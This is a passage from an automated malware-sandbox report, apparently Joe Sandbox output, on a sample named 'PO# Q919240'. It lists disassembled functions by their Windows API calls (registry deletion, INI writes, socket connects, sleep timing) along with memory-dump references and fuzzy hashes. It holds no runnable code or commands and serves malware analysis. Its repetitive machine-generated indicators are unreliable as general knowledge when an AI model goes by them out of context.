                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: PrivateProfile$SectionWrite$String
                • String ID:
                • API String ID: 2832842796-0
                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                Download Yara Rule
                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Enum$CloseDeleteOpen
                • String ID:
                • API String ID: 2095303065-0
                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 00436A24
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: RectWindow
                • String ID:
                • API String ID: 861336768-0
                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32 ref: 00449598
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                • _wcslen.LIBCMT ref: 0044960D
                • _wcslen.LIBCMT ref: 0044961A
                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$_wcspbrk
                • String ID:
                • API String ID: 1856069659-0
                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 004478E2
                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                • GetCursorPos.USER32(00000000), ref: 0044796A
                • TrackPopupMenuEx.USER32(00946440,00000000,00000000,?,?,00000000), ref: 00447991
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CursorMenuPopupTrack$Proc
                • String ID:
                • API String ID: 1300944170-0
                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • GetClientRect.USER32(?,?), ref: 004479CC
                • GetCursorPos.USER32(?), ref: 004479D7
                • ScreenToClient.USER32(?,?), ref: 004479F3
                • WindowFromPoint.USER32(?,?), ref: 00447A34
                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Client$CursorFromPointProcRectScreenWindow
                • String ID:
                • API String ID: 1822080540-0
                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClientPaintRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 659298297-0
                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                Download Yara Rule
                APIs
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                  • Part of subcall function 00440D98: SendMessageW.USER32(00941BC0,000000F1,00000000,00000000), ref: 00440E6E
                  • Part of subcall function 00440D98: SendMessageW.USER32(00941BC0,000000F1,00000001,00000000), ref: 00440E9A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$EnableMessageSend$LongShow
                • String ID:
                • API String ID: 142311417-0
                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                • IsWindowVisible.USER32(?), ref: 00445879
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                • _wcslen.LIBCMT ref: 004458FB
                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                • String ID:
                • API String ID: 3087257052-0
                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                • String ID:
                • API String ID: 245547762-0
                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                Download Yara Rule
                APIs
                • DeleteObject.GDI32(00000000), ref: 004471D8
                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                • SelectObject.GDI32(?,00000000), ref: 00447228
                • BeginPath.GDI32(?), ref: 0044723D
                • SelectObject.GDI32(?,00000000), ref: 00447266
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Object$Select$BeginCreateDeletePath
                • String ID:
                • API String ID: 2338827641-0
                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000000), ref: 00434598
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                • Sleep.KERNEL32(00000000), ref: 004345D4
                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                • MessageBeep.USER32(00000000), ref: 00460C46
                • KillTimer.USER32(?,0000040A), ref: 00460C68
                • EndDialog.USER32(?,00000001), ref: 00460C83
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$Icon
                • String ID:
                • API String ID: 4023252218-0
                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
